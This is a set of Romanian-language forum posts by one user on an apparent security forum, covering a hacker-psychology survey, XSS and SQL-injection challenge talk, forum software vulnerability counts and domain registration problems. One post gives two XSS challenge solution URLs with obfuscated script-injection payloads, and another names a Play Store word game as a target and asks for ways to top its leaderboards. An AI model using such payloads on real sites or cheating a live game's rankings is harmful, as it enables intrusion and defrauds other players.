shark0der

Lucrarea va fi publicata pe 13 iunie. O veti putea gasi in linkul de drive din chestionar, alaturi de celelalte materiale.

Salut, Un amic de-al meu, Alexandru B, fiind student la master in cadrul Facultatii de Psihologie, si-a ales tema de disertatie Criminologie Informatică: Particularitatile tulburarilor de personalitate ale hackerilor sub conditiile agresivitatii si stimei de sine si identificarea hackerilor "de mâine". Lucrarea presupune efectuarea unui studiu asupra catorva grupuri de persoane: non-hackers, white hat hackers, grey hat hackers si black hat hackers cu scopul de a sublinia aspecte psihologice ale hackerilor, in ideea in care in Romania nu a mai fost efectuat vreun studiu similar. Ma adresez tuturor care sunt interesati sa participe la acest studiu, sa completeze chestionarul de mai jos. Pot sa va asigur de urmatoarele aspecte: - Completarea chestionarului este anonima: nu se colecteaza date personale sau date care ar putea ajuta la identificarea participantilor la studiu - Chestionarul este construit folosind Google Forms care NU ofera informatii despre respondent precum email/cont Google/IP/tara/etc, si puteti chiar folosi Tor/VPN/proxy/etc alaturi de un throw-away account daca simtiti nevoia. Ca si multumire, in afara de faptul ca lucrarea va fi publicata, Alexandru va oferi si cateva materiale (carti, articole) pe domeniu. Rog seriozitate si pe cat posibil mai putin spam Link formular: https://goo.gl/forms/DhA7ElPVo1dYql5k2 Multumesc, shark0der

Ar fi o idee sa inlocuiesti butonul de like direct cu "Unlock content" ca sa scapi de icon-ul din bara si sa fie "one-click action".

Bre si eu care credeam ca dormiti la ora asta si am timp sa fac totul lejer Printre altele, trucul lui Gecko ar fi mers cu un alias.

I have nothing to prove.

I have the solution for the first one but the server is down for some reason. Reupload to another host maybe?

I'll just leave this here: 1. http://12342.site11.com/level1.php?a=%3Cinput/autofocus/onfocus=l=location.hash;location=l[i=1]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi]%2bl[%2b%2bi];//#javascript:alert(1); 2. http://12342.site11.com/level2.php?a=%22%3E%3Cscript%3E1'alert(1)%3C/script%3E

Sa ma dau si eu cu parerea. E morse, si se traduce intr-un string base64. Problema e ca la morse nu ai cum sa iti dai seama daca e litera mare sau litera mica si prin urmare string-ul obtinut (CMFWZWXJZW==) nu se decodeaza corect.

De gasit - gasesti. La "reducere" - nu se stie, cum ai norocul.

Si partea a doua, care urmeaza sa fie postata, sqli2.php (pretty hard one):

Nu te mai plange ca o femeie, SCD-ul nu era lasat cu intentia sa vada toti parola ta, daca intr-adevar ai fi vrut sa lasi SCD, trebuia sa o faci cu grija. PWND again! Si ca sa stii si cum am intrat de la bun inceput si pe tot parcursul challenge-ului: P.S. I feel your pain, bro: P.P.S. Pentru ca am fost intrebat de mai multe ori ce tool am folosit, here it is: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

un challenge usor ca apa minerala ) umadbro? ))

Target: https://play.google.com/store/apps/details?id=tr.com.fugo.kelimeavi2.ro Scop: Primul loc in toate ratingurile: zilnic, saptamanal, lunar, total + ! Top players rating ! Proof: http://i.imgur.com/J6Jzj9f.png http://i.imgur.com/htbFPy9.png http://i.imgur.com/j63WuPC.png Trimiteti solutiile sau metodele prin PM.

PHPBB Phpbb Phpbb : List of security vulnerabilities Timeframe: 2002 - 2010 (8 ani) Number of vulnerabilities: 18 Vuln/year: ~0.44 MYBB Mybb Mybb : List of security vulnerabilities Timeframe: 2005 - 2012 (7 ani) Number of vulnerabilities: 38 Vuln/year: ~5.42 Eu personal nu as folosi o platforma care la sfarsitul lui 2012 are SQLI in search cu public exploit. Plugin-urile sunt si mai gaurite.

Ai pm de la mine.

@abraxyss ai pm cu sintaxa

@abraxyss spune in care concurs anume, ca asa cum a mai zis si @FarSe au mai fost postat de n ori xss-uri in diverse concursuri.

Frumos! Felicitari! Cat despre downloader, pe linux fiind, folosesc youtube-dl si fac scripturi in bash sa-mi descarce si playlist-uri si tot P.S. My 32nd ( =25 ) post

OK, am scris 2 tickete la suport. Here's what they said: Aici am intrebat ce sa fac ca sa nu mi-l stearga si daca mi l-au sters din cauza schimbarii NS-urilor: Aici ii rugasem sa-mi schimbe numele si prenumele: In concluzie, daca inregistrati cu nume reale, nu ar trebui sa aveti probleme. Bafta

Mi l-a sters si mie. Inrebare: Cei care v-ati schimbat ns-urile, v-a sters la toti domeniul? E cineva care si-a schimbat ns-ul si nu i l-au sters? E cineva care nu si-a schimbat ns-ul si i l-au sters?

Craciun fericit si tie, Nytro

Mai bea niste lapte, poate prinzi la minte.

Proaspat hacked http://i.imgur.com/CemZE.png GG @Electrotech93

@abraxyss: Din moment ce htmlspecialchars($text, ENT_QUOTES, 'utf-8'); e cunoscut ca bulletproof nu prea vad rostul sa fac ceea ce zici tu. Challenge-ul a fost mai mult un experiment pentru a valida o idee (o platforma de challenge-uri ca sa fiu mai exact si sa nu spuna cineva ca vorbesc bullshit-uri). Din pacate nu a fost prea activa lumea (~2000 de request-uri in 2 saptamaini), dar vedem.